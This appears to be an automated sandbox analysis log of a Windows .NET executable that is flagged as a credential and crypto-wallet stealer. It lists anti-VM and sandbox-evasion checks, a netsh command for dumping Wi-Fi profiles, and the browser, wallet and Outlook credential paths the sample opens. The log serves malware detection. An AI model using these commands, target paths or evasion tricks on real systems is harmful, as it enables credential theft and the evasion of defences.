            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dllJump to behavior
            Source: C:\Windows\SysWOW64\chcp.comSection loaded: wow64win.dllJump to behavior
            Source: C:\Windows\SysWOW64\chcp.comSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Windows\SysWOW64\chcp.comSection loaded: ulib.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: credui.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: odbc32.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshwfp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpqec.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: qutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wevtapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wshelper.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ws2help.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: httpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwcfg.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: bcrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winipsec.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nci.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: devrtl.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: whhelper.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rpcnsh.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: napmontr.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: certcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshipsec.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: logoncli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: activeds.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: polstore.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2p.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2pcollab.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlancfg.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlanapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlanutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlanhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: peerdistsh.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: wssvZm9dNK.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: wssvZm9dNK.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            .NET source code contains potential unpacker
            Source: wssvZm9dNK.exe, zerujudimabcounter.cs.Net Code: zusukagabinajozazux System.Reflection.Assembly.Load(byte[])
            Source: wssvZm9dNK.exe, zerujudimabcounter.cs.Net Code: zusukagabinajozazux
            Source: wssvZm9dNK.exeStatic PE information: 0x83FE105A [Sun Mar 4 09:20:26 2040 UTC]
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Yara detected AntiVM3
            Source: Yara matchFile source: Process Memory Space: wssvZm9dNK.exe PID: 2036, type: MEMORYSTR
            Check if machine is in data center or colocation facility
            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
            Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: wssvZm9dNK.exe, 00000000.00000002.401019526.000000000261C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeMemory allocated: 1D0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeMemory allocated: 2370000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeMemory allocated: 500000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeWindow / User API: threadDelayed 1561Jump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeWindow / User API: threadDelayed 8178Jump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exe TID: 2760Thread sleep time: -60000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exe TID: 2980Thread sleep time: -20291418481080494s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exe TID: 2980Thread sleep time: -3000000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exe TID: 1568Thread sleep count: 1561 > 30Jump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exe TID: 1568Thread sleep count: 8178 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\netsh.exe TID: 2140Thread sleep time: -60000s >= -30000sJump to behavior
            Source: C:\Windows\System32\msiexec.exe TID: 3104Thread sleep time: -60000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeThread delayed: delay time: 600000Jump to behavior
            Source: wssvZm9dNK.exe, 00000000.00000002.401019526.000000000261C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
            Source: wssvZm9dNK.exe, 00000000.00000002.401019526.000000000261C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMToolsHook.dll
            Source: wssvZm9dNK.exe, 00000000.00000002.401019526.000000000261C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
            Source: wssvZm9dNK.exe, 00000000.00000002.401019526.000000000261C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmmousever.dll
            Source: wssvZm9dNK.exe, 00000000.00000002.401019526.000000000261C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmmousever
            Source: wssvZm9dNK.exe, 00000000.00000002.401019526.000000000261C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmmouseverLR
            Source: wssvZm9dNK.exe, 00000000.00000002.401019526.0000000002576000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VirtualMachine: @
            Source: wssvZm9dNK.exe, 00000000.00000002.401019526.000000000261C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmwareLR
            Source: wssvZm9dNK.exe, 00000000.00000002.401019526.000000000261C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMToolsHookLR
            Source: wssvZm9dNK.exe, 00000000.00000002.401019526.000000000264C000.00000004.00000800.00020000.00000000.sdmp, wssvZm9dNK.exe, 00000000.00000002.401019526.0000000002648000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VirtualMachine: False
            Source: wssvZm9dNK.exe, 00000000.00000002.401019526.0000000002576000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VirtualMachine:
            Source: wssvZm9dNK.exe, 00000000.00000002.401019526.000000000261C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMToolsHook
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr AllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profileJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr AllJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductIdJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeQueries volume information: C:\Users\user\Desktop\wssvZm9dNK.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Lowering of HIPS / PFW / Operating System Security Settings

            barindex
            Uses netsh to modify the Windows network and firewall settings
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

            Stealing of Sensitive Information

            barindex
            Yara detected PXRECVOWEIWOEI Stealer
            Source: Yara matchFile source: 00000000.00000002.401019526.00000000026B6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: wssvZm9dNK.exe PID: 2036, type: MEMORYSTR
            Found many strings related to Crypto-Wallets (likely being stolen)
            Source: wssvZm9dNK.exe, 00000000.00000002.401019526.00000000023B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Electrum
            Source: wssvZm9dNK.exe, 00000000.00000002.401019526.00000000023B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: pSC:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldbt-
            Source: wssvZm9dNK.exe, 00000000.00000002.401019526.00000000023B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: p3C:\Users\user\AppData\Roaming\Exodus\exodus.wallett-
            Source: wssvZm9dNK.exe, 00000000.00000002.401019526.00000000023B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: p0C:\Users\user\AppData\Roaming\Ethereum\keystoret-
            Source: wssvZm9dNK.exe, 00000000.00000002.401019526.00000000023B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Exodus
            Source: wssvZm9dNK.exe, 00000000.00000002.401019526.00000000023B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum
            Source: wssvZm9dNK.exe, 00000000.00000002.401019526.00000000023B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: p4C:\Users\user\AppData\Local\Coinomi\Coinomi\walletst-
            Source: wssvZm9dNK.exe, 00000000.00000002.401019526.00000000023B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: p0C:\Users\user\AppData\Roaming\Ethereum\keystoret-
            Tries to harvest and steal WLAN passwords
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr AllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profileJump to behavior
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\places.sqliteJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\logins.jsonJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cookies.sqliteJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.dbJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert9.dbJump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
